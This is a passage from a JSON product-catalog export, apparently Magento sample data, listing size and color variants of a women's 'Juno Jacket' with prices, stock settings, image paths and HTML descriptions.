Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1322\":{\"sku\":\"WJ06-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-S-Green\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1323\":{\"sku\":\"WJ06-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-S-Purple\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1324\":{\"sku\":\"WJ06-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-M-Blue\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1325\":{\"sku\":\"WJ06-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-M-Green\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1326\":{\"sku\":\"WJ06-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-M-Purple\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1327\":{\"sku\":\"WJ06-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-L-Blue\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1328\":{\"sku\":\"WJ06-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-L-Green\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1329\":{\"sku\":\"WJ06-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-L-Purple\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"image\":\"\\/w\\/j\\/wj06-pur